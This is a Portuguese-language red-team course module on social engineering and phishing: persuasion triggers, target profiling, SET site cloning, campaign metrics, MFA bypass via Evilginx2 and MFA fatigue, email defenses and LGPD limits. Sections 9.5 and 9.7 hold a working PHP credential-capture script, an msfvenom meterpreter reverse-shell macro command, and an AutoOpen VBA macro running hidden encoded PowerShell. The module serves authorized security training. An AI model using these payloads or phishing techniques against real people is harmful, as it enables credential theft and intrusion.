MÓDULO 9 — Engenharia Social & Phishing: Pretextos, Simulações, SET e Defesas Humanas
Team Hacking78
Especialistas em Red Teaming
Resumo Executivo (TL;DR)
Compreenda o fator humano como elo da segurança da informação. Aprenda a aplicar OSINT social para a criação de pretextos realistas, operar o Social-Engineer Toolkit (SET) para campanhas de phishing e clonagem de sites, explorar vetores de macros em documentos, analisar métricas de engajamento (click/submission rate) e implementar defesas robustas (MFA, DMARC/SPF/DKIM e conscientização contínua).

A mais sofisticada infraestrutura de segurança cibernética — composta por firewalls de última geração, EDRs e microssegmentação — perde sua eficácia quando um usuário autorizado insere suas credenciais legítimas em um portal clonado ou executa um anexo malicioso induzido por um pretexto convincente.
Estatísticas globais de inteligência de ameaças apontam que a esmagadora maioria das violações de segurança com comprometimento inicial (Initial Foothold) tem origem em ataques de Engenharia Social e Phishing. Neste módulo, você aprenderá a aplicar inteligência OSINT (Módulo 4) para a construção de pretextos fidedignos, montar e conduzir campanhas completas de simulação autorizada utilizando o Social-Engineer Toolkit (SET), analisar métricas de suscetibilidade e estruturar defesas técnicas e humanas em conformidade com a legislação.
9.1 A Psicologia da Engenharia Social e o Ciclo Operacional
A engenharia social é a arte de manipular pessoas para que realizem ações voluntárias ou divulguem informações confidenciais que comprometam a segurança da organização.
[OSINT Social (Módulo 4)]
──> [Identificação de Alvos & Mapeamento]
──> [Construção do Pretexto & Isca]
──> [Entrega do Vetor (E-mail / SMS / Telefone)]
──> [Ação da Vítima (Clique / Credencial / Payload)]
──> [Coleta de Telemetria & Métricas]
──> [Relatório Executivo & Conscientização]- Pretexto: A narrativa contextualizada que sustenta a isca. É o elemento que estabelece rapport e valida a legitimidade do pedido perante a vítima.
Os 7 Gatilhos Psicológicos de Persuasão
- Autoridade: Fingir ser um diretor, membro do departamento jurídico, suporte de TI ou auditor externo. Pessoas tendem a obedecer figuras hierárquicas sem questionar.
- Urgência: Impor prazos curtos ("Sua conta será bloqueada em 2 horas caso não confirme os dados"). A pressa desativa o pensamento analítico crítico.
- Escassez: Criação de senso de exclusividade ("Últimas 5 vagas para o bônus corporativo").
- Reciprocidade: Oferecer um benefício prévio ou brinde para induzir o usuário a retribuir com uma ação solicitada.
- Curiosidade: Despertar interesse sobre assuntos confidenciais ("Tabela salarial 2026 da diretoria em anexo").
- Medo / Alerta de Segurança: Notificações falsas de "Acesso suspeito detectado em sua conta a partir da Rússia".
- Familiaridade / Consenso Social: Mensagens com layout e jargões idênticos às ferramentas de uso diário (Google Drive, Microsoft 365, Slack, ERP interno).
A Fórmula mais Eficaz Em exercícios de Red Team corporativo, a combinação de Autoridade + Urgência Moderada + Familiaridade apresenta as maiores taxas de conversão de cliques e submissão de credenciais.
9.2 Classificação dos Vetores de Engenharia Social
- Phishing (Em Massa): Campanhas genéricas disparadas para milhares de endereços simultaneamente sem personalização prévia.
- Spear Phishing (Direcionado): Ataques customizados para indivíduos ou equipes específicas de uma empresa, utilizando dados reais de cargos e projetos.
- Whaling: Variação de Spear Phishing de altíssimo nível direcionada exclusivamente a membros do C-Level (CEOs, CFOs, Diretores).
- Smishing (SMS Phishing): Mensagens de texto contendo links fraudulentos encurtados ou números para retorno imediato.
- Vishing (Voice Phishing): Ataques telefônicos ou chamadas de voz via VoIP simulando operadores de suporte ou parceiros comerciais.
- Pharming: Envenenamento de DNS ou arquivos hosts que redireciona requisições de domínios legítimos para servidores de phishing.
- Baiting (Físico / Mídia Removível): Pen drives propositalmente "esquecidos" em estacionamentos ou recepções corporativas contendo payloads de autorun ou macros.
9.3 OSINT Aplicado à Engenharia Social
As informações coletadas na fase de reconhecimento (Módulo 4) constituem a base estrutural para a criação de campanhas de alta conversão:
- Listas de E-mails & Padrões de Nomenclatura: Extraídos via
theHarvestere Hunter.io para inferir endereços no formatonome.sobrenome@empresa.com. - Organograma Corporativo & Hierarquia: Mapeados através do LinkedIn para identificar a chefia direta da vítima e forjar remetentes com autoridade plausível.
- Stack Tecnológico em Vagas de Emprego: Menções a sistemas como SAP, Jira, Salesforce ou VPN específica para formular pretextos que citem softwares reais da rotina de trabalho.
- Vazamentos Históricos (Breach Intelligence): Dados do DeHashed e HIBP para identificar senhas antigas e utilizá-las em pretextos de "Renovação Obrigatória de Credenciais".
Modelo de Ficha de Alvo para Red Team
# Ficha de Perfil de Alvo (Spear Phishing)
- Nome do Alvo: Roberto Alencar | Setor: Controladoria Financeira
- Cargo: Analista Sênior | Superior Imediato: Mariana Torres (CFO)
- E-mail Corporativo: roberto.alencar@empresa.com
- Ferramentas Utilizadas: SAP ERP, Microsoft Teams, Outlook 365, Cisco AnyConnect
- Gatilhos Psicológicos: Urgência corporativa e autoridade do setor financeiro
- Pretexto Selecionado: "Atualização de Certificado Digital para Liberação de Folha de Pagamento"9.4 A Anatomia do E-mail de Phishing de Alta Eficácia
1. Remetente Plausível: Nome real de um colaborador ou setor legítimo (ex: "Suporte de TI <suporte@empresa-suporte.com>").
2. Linha de Assunto Contextualizada: Assuntos diretos e operacionais ("Ação Necessária: Recadastramento de Acesso VPN").
3. Pretexto e Justificativa Crível: Narrativa alinhada com as políticas reais de segurança interna da companhia.
4. Chamada para Ação Única (Single Call to Action): Um botão ou link claro e destacado (ex: "Acessar Portal Corporativo").
5. Identidade Visual e Assinatura Padronizada: Utilização de logotipo, tipografia e formato de rodapé institucional da empresa.
6. Correção Gramatical Absoluta: Erros de concordância e ortografia são os principais alertas de fraude para o usuário atento.Evasão de Filtros de E-mail (Conceitos de Avaliação)
- Typosquatting & Domínios Similares: Registro de domínios com caracteres semelhantes (
empresa-portal.comouempresa.com.brcom hífen). - Manipulação de Display Name: Configurar o nome de exibição como
Recursos Humanos <rh@empresa.com>para induzir o usuário em clientes de e-mail mobile onde o endereço real fica oculto. - Subdomínios Ilusórios: URLs como
https://empresa.com.acesso-seguro.net/loginonde o domínio real éacesso-seguro.net.
9.5 O Social-Engineer Toolkit (SET)
O Social-Engineer Toolkit (SET) é a principal suíte open-source para automação de testes de engenharia social no Kali Linux:
# Inicialização do SET no terminal
sudo setoolkitFluxo de Clonagem de Portal e Captura de Credenciais
1. Selecione: 1) Social-Engineering Attacks
2. Selecione: 2) Website Attack Vectors
3. Selecione: 3) Credential Harvester Attack Method
4. Selecione: 2) Site Cloner
5. Informe o IP do seu listener: 192.168.56.101
6. Informe a URL do portal de login a ser clonado: http://192.168.56.10/dvwa/login.phpO SET clonará a estrutura visual do site, iniciará um servidor HTTP local na porta 80 e interceptará todas as credenciais submetidas no formulário, gravando os registros em logs estruturados.
Implementação Manual com Servidor Web e PHP
// /var/www/html/capture.php
<?php
$file = fopen("creds_log.txt", "a");
fwrite($file, "Data: " . date("Y-m-d H:i:s") . " | User: " . $_POST['username'] . " | Pass: " . $_POST['password'] . "
");
fclose($file);
header("Location: https://portal-legitimo.empresa.com/login?error=timeout");
exit();
?>9.6 Estruturação de uma Campanha de Phishing Corporativa
Uma campanha de simulação corporativa autorizada segue 7 etapas rigorosas de governança:
- Etapa 1: Escopo e Aprovação Formal: Definição por escrito do Termo de Consentimento, lista fechada de e-mails, datas da janela e aprovação do pretexto pela diretoria ou CISO.
- Etapa 2: Infraestrutura Dedicada: Configuração de servidores com certificados TLS, domínios configurados e páginas de coleta ativas.
- Etapa 3: Redação do Pretexto e Template: Criação da mensagem de e-mail personalizada com elementos institucionais.
- Etapa 4: Disparo Controlado: Envio escalonado via ferramentas de simulação (como GoPhish ou scripts SMTP autorizados).
- Etapa 5: Monitoramento em Tempo Real: Acompanhamento das taxas de abertura, cliques e envios de dados.
- Etapa 6: Métricas e Análise de Risco: Compilação dos indicadores quantitativos para o relatório final.
- *Etapa 7: Treinamento Imediato (Teachable Moment):* Redirecionar os colaboradores que interagiram com o link para uma página educativa com dicas práticas para identificação de ataques.
Métricas Fundamentais do Relatório
- Total de E-mails Entregues: N (100%)
- Taxa de Abertura (Open Rate): N (%)
- Taxa de Cliques no Link (Click Rate): N (%)
- Taxa de Submissão de Credenciais (Submission Rate): N (%) ← Métrica mais crítica de risco
- Setores Mais Suscetíveis: Mapeamento por departamento (ex: Financeiro, RH, Operações)9.7 Vetores de Execução de Código em Documentos (Macros VBA)
Quando o escopo do engajamento autoriza testes de execução inicial via engenharia social:
# Geração de payload VBA para documentos Office com MSFVenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=4444 -f vba-psh -o payload_macro.txt' Exemplo de estrutura de macro VBA embarcada em documento .docm:
Sub AutoOpen()
Dim cmd As String
cmd = "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc <PAYLOAD_BASE64>"
Shell cmd, vbHide
End SubRestrições de Operação e Segurança O uso de payloads executáveis em simulações exige autorização expressa no RoE para evitar impactos em estações produtivas de trabalho.
9.8 Vishing, Smishing e Técnicas Modernas de Evasão de MFA
- Vishing Operacional: Chamadas com scripts de suporte técnico solicitando confirmação de dados cadastrais ou validação de logins anômalos.
- Smishing: Mensagens SMS alertando sobre bloqueios de cartão ou confirmações de transferências bancárias via PIX.
- MFA Fatigue (Push Spamming): Disparo repetido de dezenas de solicitações de autenticação de dois fatores no smartphone da vítima até que ela aprove a notificação por exaustão.
- Reverse Proxy Phishing (Evilginx2): Posicionamento de um proxy reverso transparente entre a vítima e o serviço legítimo (ex: Microsoft 365), permitindo a captura em tempo real de tokens e cookies de sessão autenticados, contornando a proteção do MFA.
9.9 Controles Defensivos Técnicos e Humanos
Controles Técnicos Essenciais
- Autenticação de E-mail: Implementação obrigatória de registros SPF, chaves criptográficas DKIM e políticas rigorosas de rejeição com DMARC (
p=reject). - Autenticação Multifator Físico (FIDO2 / WebAuthn): Utilização de chaves de segurança de hardware (como YubiKey) imunes a ataques de phishing por proxy reverso.
- Filtros Anti-Spam com Inspeção de Links: Sandboxing de anexos e reescrita de URLs em soluções como Microsoft Defender for Office e Proofpoint.
- Bloqueio de Macros: Desativação centralizada de macros em arquivos recebidos da internet via políticas de grupo (GPO).
Controles Humanos e Cultura Organizacional
- Simulações Periódicas Contínuas: Treinamentos mensais de phishing com complexidade progressiva.
- Cultura Sem Punição (Blameless Culture): O objetivo é educar e conscientizar, jamais penalizar ou constranger colaboradores.
- Canal Ágil de Notificação: Botão integrado de "Reportar Phishing" no cliente de e-mail com resposta imediata do SOC.
9.10 Aspectos Legais, Éticos e Conformidade com a LGPD
- Autorização Escrita Prévia: Nunca dispare simulações sem contrato formal e Termo de Consentimento assinado pela diretoria.
- Escopo Estritamente Fechado: Proibido o envio de mensagens para fornecedores, parceiros ou clientes do contratante sem autorização expressa.
- Proteção e Minimização de Dados (LGPD): Senhas digitadas durante o teste devem ser imediatamente mascaradas ou excluídas; apenas o status do envio deve ser registrado no relatório.
- Proibição de Pretextos Ilícitos ou Difamatórios: Não utilizar pretextos envolvendo demissões em massa, dados médicos ou calúnias.
9.11 Checklist de Conclusão do Módulo 9
- [x] Compreendo os diferentes vetores de engenharia social (Phishing, Spear, Whaling, Vishing, Smishing).
- [x] Sei identificar e aplicar os gatilhos psicológicos na formulação de pretextos fidedignos.
- [x] Utilizo inteligência OSINT para personalizar campanhas direcionadas de Spear Phishing.
- [x] Domino a operação do Social-Engineer Toolkit (SET) para clonagem de sites e captura de credenciais.
- [x] Sei estruturar campanhas de simulação corporativa em todas as suas 7 etapas operacionais.
- [x] Compreendo o funcionamento de macros VBA e vetores de documentos Office.
- [x] Conheço os mecanismos de bypass de MFA (MFA Fatigue e Reverse Proxy com Evilginx2).
- [x] Sei calcular e interpretar métricas de Click Rate e Submission Rate para relatórios executivos.
- [x] Recomendo controles técnicos (SPF, DKIM, DMARC, FIDO2) e programas contínuos de conscientização.
- [x] Conheço e respeito os limites legais, regras de engajamento e diretrizes da LGPD.
Perguntas Frequentes (FAQ)
Qual é a diferença entre a taxa de cliques (Click Rate) e a taxa de submissão (Submission Rate)?
A taxa de cliques (Click Rate) indica a porcentagem de destinatários que clicaram no link presente no e-mail de phishing, medindo a curiosidade ou o engano inicial do usuário. Já a taxa de submissão (Submission Rate) mede quantos desses usuários efetivamente preencheram e enviaram dados confidenciais (como usuário e senha) no portal fraudulento, representando o impacto e o risco real de comprometimento de credenciais.
Como o DMARC, SPF e DKIM protegem a organização contra ataques de phishing e spoofing?
O SPF especifica quais servidores IP estão autorizados a enviar e-mails em nome de um domínio. O DKIM adiciona uma assinatura criptográfica digital aos cabeçalhos das mensagens para comprovar que o e-mail não foi adulterado no trânsito. O DMARC unifica essas validações e define a política de segurança (none, quarantine ou reject) que os servidores de e-mail de destino devem aplicar quando as mensagens não passarem nos testes de autenticação.
Por que as chaves de segurança FIDO2 / WebAuthn são consideradas imunes a phishing por proxy reverso (Evilginx)?
As chaves FIDO2 realizam a autenticação vinculando a credencial criptográfica ao domínio exato (Origin Binding) presente na barra de endereços do navegador. Mesmo que o usuário seja enganado por um portal clonado em um domínio falso, o navegador detectará que o domínio não coincide com a chave registrada e recusará a assinatura do token, impedindo o roubo da sessão.
Quais cuidados a Lei Geral de Proteção de Dados (LGPD) exige durante uma simulação de phishing corporativa?
A LGPD exige a minimização de dados e a confidencialidade das informações coletadas. As senhas reais digitadas pelos colaboradores jamais devem ser armazenadas em texto claro ou expostas em relatórios abertos. Além disso, a lista de funcionários que interagiram com o teste deve ser tratada como dado restrito e utilizada exclusivamente para fins pedagógicos de treinamento, sem finalidade punitiva.
